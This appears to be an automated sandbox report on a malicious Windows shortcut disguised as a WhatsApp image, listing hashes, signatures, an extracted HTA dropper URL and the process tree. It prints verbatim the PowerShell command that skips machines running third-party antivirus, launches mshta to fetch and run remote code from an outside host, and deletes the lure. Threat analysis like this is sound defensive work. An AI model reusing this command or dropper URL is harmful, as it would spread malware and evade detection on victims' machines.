Analysis
-
max time kernel
117s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
29-02-2024 05:05
Static task
static1
Behavioral task
behavioral1
Sample
WhatsApp Görsel 2024-02-28 saat 14.52.35_809ff0ec.jpg.lnk
Resource
win7-20240221-en
windows7-x64
7 signatures
150 seconds
Behavioral task
behavioral2
Sample
WhatsApp Görsel 2024-02-28 saat 14.52.35_809ff0ec.jpg.lnk
Resource
win10v2004-20240226-en
windows10-2004-x64
7 signatures
150 seconds
General
-
Target
WhatsApp Görsel 2024-02-28 saat 14.52.35_809ff0ec.jpg.lnk
-
Size
1KB
-
MD5
0365118a92333b6faa474aded6b3a6f2
-
SHA1
0bcac8b38e4e338508606c897eb7e36ad9d8a68e
-
SHA256
98e44c818340bc1657402ed6b463ae52247f6d52d45d4a5aa0e6fad5b4935b1e
-
SHA512
08007340cd5d133aae544597937a9cb1de83f29ff068c1aec023f3182dac1b92f7b150d2e0ecb9392f756c8271a759198840718cba82387432093e691dac3eaf
Score
10/10
Malware Config
Extracted
Language
hta
Source
URLs
hta.dropper
https://thanhancompany.com/grip/FYI
Signatures
-
Blocklisted process makes network request 4 IoCs
flow pid Process 4 2572 mshta.exe 6 2572 mshta.exe 7 2572 mshta.exe 8 2572 mshta.exe -
Deletes itself 1 IoCs
pid Process 2540 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2540 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2540 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 2248 wrote to memory of 2540 2248 cmd.exe 29 PID 2248 wrote to memory of 2540 2248 cmd.exe 29 PID 2248 wrote to memory of 2540 2248 cmd.exe 29 PID 2540 wrote to memory of 2572 2540 powershell.exe 30 PID 2540 wrote to memory of 2572 2540 powershell.exe 30 PID 2540 wrote to memory of 2572 2540 powershell.exe 30
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\WhatsApp Görsel 2024-02-28 saat 14.52.35_809ff0ec.jpg.lnk"1⤵
- Suspicious use of WriteProcessMemory
PID:2248 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $u = Get-WmiObject -Namespace 'root\SecurityCenter2' -Class AntiVirusProduct -ComputerName $env:computername;foreach($v in $u ){if ($v.displayName -replace 'Windows Defender', ''){Exit}}.(gp -pa 'HKLM:\SOF*\Clas*\Applications\msh*e').('PSChildName')https://thanhancompany.com/grip/FYI;$SMAF = Get-Location;$SMAF = Join-Path $SMAF 'WhatsApp Görsel 2024-02-28 saat 14.52.35_809ff0ec.jpg.lnk';del $SMAF2⤵
- Deletes itself
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2540 -
C:\Windows\system32\mshta.exe"C:\Windows\system32\mshta.exe" https://thanhancompany.com/grip/FYI3⤵
- Blocklisted process makes network request
- Modifies Internet Explorer settings
PID:2572
-
-